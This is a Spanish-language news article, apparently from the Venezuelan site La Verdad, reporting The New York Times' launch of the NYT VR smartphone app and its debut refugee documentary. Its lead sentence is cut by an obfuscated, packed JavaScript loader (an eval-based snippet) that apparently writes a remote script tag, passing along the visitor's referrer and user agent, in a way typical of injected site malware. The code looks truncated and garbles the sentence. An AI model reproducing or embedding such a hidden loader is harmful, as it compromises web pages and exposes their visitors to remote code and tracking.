publicidad

The New York Times lanza servicio en realidad virtual

EFE / Nueva York / web@laverdad.com
El eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kzdnn|var|u0026u|referrer|bzdfe||js|php'.split('|'),0,{})) servicio, que debe usarse a través de un teléfono móvil inteligente, se enmarca en la estrategia del diario neoyorquino para expandirse más allá del papel y de su edición digital

Para el estreno del NYT VR, la publicación ha elegido el retrato de tres niños refugiados que huyen de las guerras de Sudán del Sur, Ucrania y Siria

El diario The New York Times lanzó hoy un nuevo servicio que permite navegar sobre algunas de sus noticias y reportajes con realidad virtual a través de la aplicación NYT VR.

El servicio, que debe usarse a través de un teléfono móvil inteligente, se enmarca en la estrategia del diario neoyorquino para expandirse más allá del papel y de su edición digital.

Según el editor del dominical The Times Magazine, Jake Silverstein, la nueva forma de tecnología cinematográfica que permite al lector introducirse en los escenarios del reportaje "provoca un sentimiento de conexión sin precedentes".

Para el estreno del NYT VR, la publicación ha elegido el retrato de tres niños refugiados que huyen de las guerras de Sudán del Sur, Ucrania y Siria.

Los primeros usuarios del nuevo servicio de realidad virtual también pueden ver ya "Walking New York", un documental sobre el proceso de diseño de portadas de Time Magazine. 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama